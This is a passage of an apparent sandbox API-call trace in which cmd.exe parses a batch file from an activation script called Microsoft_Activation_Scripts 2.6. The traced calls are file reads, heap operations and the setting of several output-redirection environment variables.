lDistanceToMove=3232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xca0 [0175.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n defined _args echo \"%_args%\" | find /i \"/\" >nul && set _MASunattended=1\r\n==============================================================\r\n") returned 2 [0175.776] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.776] GetFileType (hFile=0x90) returned 0x1 [0175.776] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.776] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xca0 [0175.776] GetProcessHeap () returned 0x19a8f1e0000 [0175.776] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.776] GetProcessHeap () returned 0x19a8f1e0000 [0175.777] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.777] _tell (_FileHandle=3) returned 3232 [0175.777] _close (_FileHandle=3) returned 0 [0175.777] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.777] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.777] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.777] SetFilePointer (in: hFile=0x90, lDistanceToMove=3232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xca0 [0175.777] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.777] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xca0 [0175.777] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.778] SetFilePointer (in: hFile=0x90, lDistanceToMove=3372, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd2c [0175.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0175.778] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.778] GetFileType (hFile=0x90) returned 0x1 [0175.778] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.778] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd2c [0175.778] GetProcessHeap () returned 0x19a8f1e0000 [0175.778] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.778] GetProcessHeap () returned 0x19a8f1e0000 [0175.778] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.778] _tell (_FileHandle=3) returned 3372 [0175.778] _close (_FileHandle=3) returned 0 [0175.778] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.779] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.779] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.779] SetFilePointer (in: hFile=0x90, lDistanceToMove=3372, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd2c [0175.779] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.779] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd2c [0175.779] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.779] SetFilePointer (in: hFile=0x90, lDistanceToMove=3374, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd2e [0175.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0175.779] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.779] GetFileType (hFile=0x90) returned 0x1 [0175.779] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.779] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd2e [0175.779] GetProcessHeap () returned 0x19a8f1e0000 [0175.779] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.779] GetProcessHeap () returned 0x19a8f1e0000 [0175.780] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.780] _tell (_FileHandle=3) returned 3374 [0175.780] _close (_FileHandle=3) returned 0 [0175.780] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.780] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.780] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.780] SetFilePointer (in: hFile=0x90, lDistanceToMove=3374, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd2e [0175.780] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.780] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd2e [0175.780] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.780] SetFilePointer (in: hFile=0x90, lDistanceToMove=3392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd40 [0175.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul1=1>nul\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"nul1=1>nul\"\r\n========================================================================================================================\r\n") returned 18 [0175.781] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.781] GetFileType (hFile=0x90) returned 0x1 [0175.781] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.781] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd40 [0175.781] GetProcessHeap () returned 0x19a8f1e0000 [0175.781] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.781] GetProcessHeap () returned 0x19a8f1e0000 [0175.781] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.781] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.781] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.781] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.781] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.781] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.781] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.781] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.781] GetProcessHeap () returned 0x19a8f1e0000 [0175.782] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0175.782] GetProcessHeap () returned 0x19a8f1e0000 [0175.782] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0175.782] GetProcessHeap () returned 0x19a8f1e0000 [0175.782] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e08b0 [0175.782] _tell (_FileHandle=3) returned 3392 [0175.782] _close (_FileHandle=3) returned 0 [0175.782] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.782] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.782] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.782] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.782] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.782] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.782] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.782] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.782] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.782] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.782] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.782] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.783] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.783] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.783] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.783] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.783] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.783] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.783] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.783] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.783] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.783] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.783] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.783] GetProcessHeap () returned 0x19a8f1e0000 [0175.783] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f9450 [0175.783] GetProcessHeap () returned 0x19a8f1e0000 [0175.783] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9450, Size=0x2c) returned 0x19a8f1e0970 [0175.783] GetProcessHeap () returned 0x19a8f1e0000 [0175.784] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0970) returned 0x2c [0175.784] wcsncmp (_String1="\"nul", _String2="/", _MaxCount=0x4) returned -13 [0175.784] GetProcessHeap () returned 0x19a8f1e0000 [0175.784] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0d70 [0175.784] _wcsnicmp (_String1="\"n", _String2="/A", _MaxCount=0x2) returned -13 [0175.784] _wcsnicmp (_String1="\"n", _String2="/P", _MaxCount=0x2) returned -13 [0175.784] SetEnvironmentVariableW (lpName="nul1", lpValue="1>nul") returned 1 [0175.784] GetProcessHeap () returned 0x19a8f1e0000 [0175.784] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.784] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.784] GetProcessHeap () returned 0x19a8f1e0000 [0175.784] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb52) returned 0x19a8f1ef6b0 [0175.784] memcpy (in: _Dst=0x19a8f1ef6b0, _Src=0x19a8f1eeb50, _Size=0xb52 | out: _Dst=0x19a8f1ef6b0) returned 0x19a8f1ef6b0 [0175.784] FreeEnvironmentStringsA (penv="=") returned 1 [0175.784] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.784] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.785] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.785] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.785] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.785] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.786] SetConsoleInputExeNameW () returned 0x1 [0175.786] GetConsoleOutputCP () returned 0x1b5 [0175.786] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.787] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.787] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.787] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.787] SetFilePointer (in: hFile=0x90, lDistanceToMove=3392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd40 [0175.787] GetProcessHeap () returned 0x19a8f1e0000 [0175.787] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0d70) returned 1 [0175.787] GetProcessHeap () returned 0x19a8f1e0000 [0175.788] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0970) returned 1 [0175.788] GetProcessHeap () returned 0x19a8f1e0000 [0175.788] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08b0) returned 1 [0175.788] GetProcessHeap () returned 0x19a8f1e0000 [0175.788] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0175.788] GetProcessHeap () returned 0x19a8f1e0000 [0175.788] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0175.788] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.788] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd40 [0175.789] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.789] SetFilePointer (in: hFile=0x90, lDistanceToMove=3410, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd52 [0175.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul2=2>nul\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"nul2=2>nul\"\r\n========================================================================================================================\r\n") returned 18 [0175.789] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.789] GetFileType (hFile=0x90) returned 0x1 [0175.789] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.789] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd52 [0175.789] GetProcessHeap () returned 0x19a8f1e0000 [0175.789] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0175.789] GetProcessHeap () returned 0x19a8f1e0000 [0175.789] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0175.789] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.789] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.790] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.790] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.790] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.790] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.790] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.790] GetProcessHeap () returned 0x19a8f1e0000 [0175.790] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0175.790] GetProcessHeap () returned 0x19a8f1e0000 [0175.790] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec860 [0175.790] GetProcessHeap () returned 0x19a8f1e0000 [0175.790] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e09b0 [0175.790] _tell (_FileHandle=3) returned 3410 [0175.790] _close (_FileHandle=3) returned 0 [0175.790] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.790] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.790] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.790] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.790] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.790] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.790] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.790] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.790] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.790] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.790] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.790] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.791] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.791] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.791] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.791] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.791] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.791] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.791] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.791] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.791] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.791] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.791] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.791] GetProcessHeap () returned 0x19a8f1e0000 [0175.791] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f8f50 [0175.791] GetProcessHeap () returned 0x19a8f1e0000 [0175.791] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8f50, Size=0x2c) returned 0x19a8f1e0cf0 [0175.791] GetProcessHeap () returned 0x19a8f1e0000 [0175.791] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0cf0) returned 0x2c [0175.791] wcsncmp (_String1="\"nul", _String2="/", _MaxCount=0x4) returned -13 [0175.791] GetProcessHeap () returned 0x19a8f1e0000 [0175.791] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0b30 [0175.791] _wcsnicmp (_String1="\"n", _String2="/A", _MaxCount=0x2) returned -13 [0175.791] _wcsnicmp (_String1="\"n", _String2="/P", _MaxCount=0x2) returned -13 [0175.792] SetEnvironmentVariableW (lpName="nul2", lpValue="2>nul") returned 1 [0175.792] GetProcessHeap () returned 0x19a8f1e0000 [0175.792] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef6b0) returned 1 [0175.792] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.792] GetProcessHeap () returned 0x19a8f1e0000 [0175.792] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb68) returned 0x19a8f1eeb50 [0175.792] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb68 | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.792] FreeEnvironmentStringsA (penv="=") returned 1 [0175.792] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.792] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.793] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.793] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.793] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.793] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.793] SetConsoleInputExeNameW () returned 0x1 [0175.793] GetConsoleOutputCP () returned 0x1b5 [0175.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.794] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.794] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.794] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.794] SetFilePointer (in: hFile=0x90, lDistanceToMove=3410, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd52 [0175.794] GetProcessHeap () returned 0x19a8f1e0000 [0175.795] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0175.795] GetProcessHeap () returned 0x19a8f1e0000 [0175.795] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0cf0) returned 1 [0175.795] GetProcessHeap () returned 0x19a8f1e0000 [0175.795] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09b0) returned 1 [0175.795] GetProcessHeap () returned 0x19a8f1e0000 [0175.795] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec860) returned 1 [0175.796] GetProcessHeap () returned 0x19a8f1e0000 [0175.796] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0175.796] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.796] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd52 [0175.796] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.796] SetFilePointer (in: hFile=0x90, lDistanceToMove=3429, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd65 [0175.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul6=2^>nul\"\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"nul6=2^>nul\"\r\n=======================================================================================================================\r\n") returned 19 [0175.796] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.796] GetFileType (hFile=0x90) returned 0x1 [0175.796] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.796] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd65 [0175.796] GetProcessHeap () returned 0x19a8f1e0000 [0175.796] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd30 [0175.796] GetProcessHeap () returned 0x19a8f1e0000 [0175.797] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd30) returned 1 [0175.797] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.797] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.797] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.797] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.797] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.797] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.799] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.799] GetProcessHeap () returned 0x19a8f1e0000 [0175.799] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0175.799] GetProcessHeap () returned 0x19a8f1e0000 [0175.799] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecbc0 [0175.799] GetProcessHeap () returned 0x19a8f1e0000 [0175.799] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e09b0 [0175.799] _tell (_FileHandle=3) returned 3429 [0175.799] _close (_FileHandle=3) returned 0 [0175.800] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.800] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.800] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.800] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.800] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.800] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.800] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.800] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.800] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.800] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.800] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.800] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.800] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.800] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.801] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.801] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.801] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.801] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.801] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.801] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.801] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.801] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.801] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.801] GetProcessHeap () returned 0x19a8f1e0000 [0175.801] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8940 [0175.801] GetProcessHeap () returned 0x19a8f1e0000 [0175.801] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8940, Size=0x2e) returned 